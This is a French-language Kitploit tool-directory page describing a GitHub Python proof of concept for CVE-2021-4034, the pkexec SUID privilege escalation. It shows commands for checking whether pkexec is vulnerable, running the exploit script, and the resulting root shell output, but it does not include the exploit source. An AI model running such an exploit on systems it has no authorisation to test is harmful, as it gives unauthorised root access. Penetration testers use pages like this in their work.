Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-4034 — Preuve de concept en Python pour CVE-2021-4034 qui abuse du binaire SUID pkexec pour élever les privilèges et lancer un shell root interactif sans identifiants. | Kitploit
Outils/GitHubGitHub/a1vinsmith/cve-2021-4034
Escalade de PrivilègesGénération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionExploitation de Binaires
GitHuba1vinsmith/cve-2021-4034

CVE-2021-4034

Preuve de concept en Python pour CVE-2021-4034 qui abuse du binaire SUID pkexec pour élever les privilèges et lancer un shell root interactif sans identifiants.

Voir le dépôt
11il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-4034 (pkexec) L'utilisation de ce script en python exploite la vulnérabilité du fichier pkexec pour obtenir un accès root sans fournir d'identifiants

· Détecte si le binaire a les privilèges SUID, dans ce cas il est vulnérable

root@kitploit:~
usuario@gatogamer $ ls -la /usr/bin/pkexec
.rwsr-xr-x 1 root root /usr/bin/pkexec
usuario@gatogamer $
  

· Exécute l'exploit pour obtenir un accès root, dans ce cas il suffit de l'exécuter avec python3, à la fin vous aurez une console en tant que root

root@kitploit:~
usuario@gatogamer $ python3 CVE-2021-4034.py
 [+] Iniciando el exploit
 [+] Exploit Completado
# whoami
root
#
  

· En complément, vous pouvez changer la valeur de TERM, par exemple 'xterm' ou 'xterm-256color' pour une meilleure esthétique, et exécuter un shell différent comme 'bash' ou 'zsh', nous avons maintenant une console complètement interactive

root@kitploit:~
# export TERM=xterm-256color
# zsh
root@gatogamer $
Télécharger l’outil